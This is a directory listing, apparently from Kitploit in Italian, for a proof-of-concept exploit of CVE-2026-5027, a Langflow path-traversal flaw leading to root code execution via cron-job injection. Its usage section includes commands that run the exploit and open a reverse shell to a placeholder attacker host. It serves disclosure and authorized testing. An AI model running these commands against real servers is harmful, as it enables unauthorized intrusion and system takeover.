Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/yahiahamza/cve-2026-5027
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubyahiahamza/cve-2026-5027

CVE-2026-5027

Proof-of-concept exploit per CVE-2026-5027, una vulnerabilità di path traversal in Langflow che porta a esecuzione remota di codice non autenticata tramite iniezione di cron job.

Vedi Repository
424 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-5027 - Path Traversal in Langflow verso Remote Code Execution

Descrizione

Le versioni di Langflow fino alla 1.8.4 inclusa non sanitizzano il parametro filename nell'endpoint POST /api/v2/files. Un attaccante può utilizzare sequenze di path traversal (../) per scrivere file in posizioni arbitrarie del filesystem. Se combinato con la configurazione predefinita di auto-login di Langflow, questo è sfruttabile senza alcuna autenticazione, portando a Remote Code Execution come root tramite l'iniezione di cron job.

Versioni Interessate

  • Vulnerabile: Langflow <= 1.8.4
  • Corretta: Nessuna patch disponibile al momento della scrittura
  • Configurazione predefinita: Auto-login abilitato (sfruttamento non autenticato)
  • Advisory: Tenable TRA-2026-26

Utilizzo

root@kitploit:~
# Proof of concept (scrive un file di test in /tmp/)
python3 exploit.py -t http://target:7860

# Con credenziali (se l'auto-login è disabilitato)
python3 exploit.py -t http://target:7860 -u admin -p password

# Reverse shell tramite cron job
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444

Esempio di Output

CVE-2026-5027 Exploit

CVE-2026-5027 Reverse Shell

Causa Principale

La funzione upload_user_file() in src/backend/base/langflow/api/v2/files.py passa file.filename direttamente al servizio di storage senza sanitizzazione. Il metodo LocalStorageService.save_file() costruisce il percorso utilizzando folder_path / file_name, che non impedisce il directory traversal.

Riferimenti

  • Tenable Advisory TRA-2026-26
  • Langflow GitHub
  • CVE-2026-5027: Langflow Path Traversal to RCE - Full Technical Analysis

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.

Autore

Yahia Hamza - https://yh.do

Scarica lo strumento